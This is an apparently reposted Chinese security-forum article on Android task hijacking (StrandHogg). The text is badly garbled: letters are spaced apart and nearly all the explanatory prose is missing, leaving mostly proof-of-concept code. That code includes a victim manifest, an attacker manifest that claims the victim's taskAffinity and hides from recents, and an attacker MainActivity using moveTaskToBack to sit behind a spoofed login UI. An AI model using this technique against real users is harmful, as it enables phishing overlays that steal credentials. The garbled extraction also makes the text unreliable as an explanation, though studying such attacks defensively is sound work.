[28891] 2021-04-28_深入研究Android中的任务劫持

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-19
2021-04-28_深入研究Android中的任务劫持 A n d r o i d O t s   2 0 2 1 - 0 4 - 2 8 A n d r o i d M a n i f e s t . x m l A n d r o i d 使 / / P r o m o n   S e c u r i t y S t r a n d H o g g 2 0 1 5 U S E N I X A n d r o i d P o C T a k e M y H a n d S e c u r i t y   B l o g h t t p s : / / b l o g . t a k e m y h a n d . x y z / 2 0 2 1 / 0 2 / a n d r o i d - t a s k - h i j a c k i n g - w i t h . h t m l E m p t y A n d r o i d   S t u d i o G i t h u b h t t p s : / / g i t h u b . c o m / a z 0 m b 1 3 / T a s k _ H i j a c k i n g _ S t r a n d h o g g A n d r o i d M a n i f e s t . x m l
a n d r o i d : l a u n c h M o d e = " s i n g l e T a s k " P o C A n d r o i d M a n i f e s t . x m l < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " u t f - 8 " ? > < m a n i f e s t   x m l n s : a n d r o i d = " h t t p : / / s c h e m a s . a n d r o i d . c o m / a p k / r e s / a n d r o i d " p a c k a g e = " c o m . z o m b i e . s s a " > < a p p l i c a t i o n a n d r o i d : a l l o w B a c k u p = " t r u e " a n d r o i d : i c o n = " @ m i p m a p / i c _ l a u n c h e r " a n d r o i d : l o g o = " @ m i p m a p / i c _ l a u n c h e r " a n d r o i d : l a b e l = " @ s t r i n g / a p p _ n a m e " a n d r o i d : r o u n d I c o n = " @ m i p m a p / i c _ l a u n c h e r _ r o u n d " a n d r o i d : s u p p o r t s R t l = " t r u e " a n d r o i d : t h e m e = " @ s t y l e / T h e m e . S u p e r S e c u r e A p p " > < a c t i v i t y   a n d r o i d : n a m e = " . L o g g e d I n " > < / a c t i v i t y > < a c t i v i t y   a n d r o i d : n a m e = " . M a i n A c t i v i t y "   a n d r o i d : l a u n c h M o d e = " s i n g l e T a s k " > < i n t e n t - f i l t e r > < a c t i o n   a n d r o i d : n a m e = " a n d r o i d . i n t e n t . a c t i o n . M A I N "   / > < c a t e g o r y   a n d r o i d : n a m e = " a n d r o i d . i n t e n t . c a t e g o r y . L A U N C H E R "   / > < / i n t e n t - f i l t e r > < / a c t i v i t y > < / a p p l i c a t i o n > < / m a n i f e s t > < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " u t f - 8 " ? > < m a n i f e s t   x m l n s : a n d r o i d = " h t t p : / / s c h e m a s . a n d r o i d . c o m / a p k / r e s / a n d r o i d " x m l n s : t o o l s = " h t t p : / / s c h e m a s . a n d r o i d . c o m / t o o l s " p a c k a g e = " c o m . z o m b i e . a t t a c k e r a p p " t o o l s : i g n o r e = " E x t r a T e x t " > < u s e s - p e r m i s s i o n   a n d r o i d : n a m e = " a n d r o i d . p e r m i s s i o n . A C C E S S _ F I N E _ L O C A T I O N "   / > < a p p l i c a t i o n a n d r o i d : a l l o w B a c k u p = " t r u e " a n d r o i d : i c o n = " @ m i p m a p / i c _ l a u n c h e r " a n d r o i d : l a b e l = " @ s t r i n g / a p p _ n a m e " a n d r o i d : r o u n d I c o n = " @ m i p m a p / i c _ l a u n c h e r _ r o u n d " a n d r o i d : s u p p o r t s R t l = " t r u e " a n d r o i d : t h e m e = " @ s t y l e / T h e m e . A t t a c k e r A p p " a n d r o i d : t a s k A f f i n i t y = " c o m . z o m b i e . s s a " >
使 -   a n d r o i d : t a s k A f f i n i t y = " c o m . z o m b i e . s s a " a n d r o i d : e x c l u d e F r o m R e c e n t s M a i n A c t i v i t y . j a v a a n d r o i d : t a s k A f f i n i t y = " c o m . z o m b i e . s s a " > < a c t i v i t y   a n d r o i d : n a m e = " . M a i n A c t i v i t y "   a n d r o i d : l a u n c h M o d e = " s i n g l e T a s k "   a n d r o i d : e x c l u d e F r o m R e c e n t s = " t r u e " > < i n t e n t - f i l t e r > < a c t i o n   a n d r o i d : n a m e = " a n d r o i d . i n t e n t . a c t i o n . M A I N "   / > < c a t e g o r y   a n d r o i d : n a m e = " a n d r o i d . i n t e n t . c a t e g o r y . L A U N C H E R "   / > < / i n t e n t - f i l t e r > < / a c t i v i t y > < / a p p l i c a t i o n > < / m a n i f e s t > p a c k a g e   c o m . z o m b i e . a t t a c k e r a p p ; i m p o r t   a n d r o i d x . a p p c o m p a t . a p p . A p p C o m p a t A c t i v i t y ; i m p o r t   a n d r o i d x . c o r e . a p p . A c t i v i t y C o m p a t ; i m p o r t   a n d r o i d . M a n i f e s t ; i m p o r t   a n d r o i d . c o n t e n t . I n t e n t ; i m p o r t   a n d r o i d . c o n t e n t . p m . P a c k a g e M a n a g e r ; i m p o r t   a n d r o i d . o s . B u i l d ; i m p o r t   a n d r o i d . o s . B u n d l e ; i m p o r t   a n d r o i d . v i e w . V i e w ; i m p o r t   a n d r o i d . w i d g e t . E d i t T e x t ; i m p o r t   a n d r o i d . w i d g e t . T e x t V i e w ; i m p o r t   c o m . g o o g l e . a n d r o i d . m a t e r i a l . s n a c k b a r . S n a c k b a r ; p u b l i c   c l a s s   M a i n A c t i v i t y   e x t e n d s   A p p C o m p a t A c t i v i t y   {         @ O v e r r i d e         p r o t e c t e d   v o i d   o n C r e a t e ( B u n d l e   s a v e d I n s t a n c e S t a t e )   { s u p e r . o n C r e a t e ( s a v e d I n s t a n c e S t a t e ) ;                 s e t C o n t e n t V i e w ( R . l a y o u t . a c t i v i t y _ m a i n ) ;                 m o v e T a s k T o B a c k ( t r u e ) ;         }
m o v e T a s k T o B a c k ( t r u e )   便 S u p e r   S e c u r e   A p p A t t a c k e r U I P r o m o n h t t p s : / / b l o g . d i x i t a d i t y a . c o m / a n d r o i d - t a s k - h i j a c k i n g /         @ O v e r r i d e p u b l i c   v o i d   o n R e s u m e ( ) { s u p e r . o n R e s u m e ( ) ;                 s e t C o n t e n t V i e w ( R . l a y o u t . a c t i v i t y _ m a i n ) ;         } }
h t t p s : / / d e v e l o p e r . a n d r o i d . c o m / g u i d e / c o m p o n e n t s / a c t i v i t i e s / t a s k s - a n d - b a c k - s t a c k h t t p s : / / p r o m o n . c o / s e c u r i t y - n e w s / s t r a n d h o g g / h t t p s : / / b l o g . t a k e m y h a n d . x y z / 2 0 2 1 / 0 2 / a n d r o i d - t a s k - h i j a c k i n g - w i t h . h t m l
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则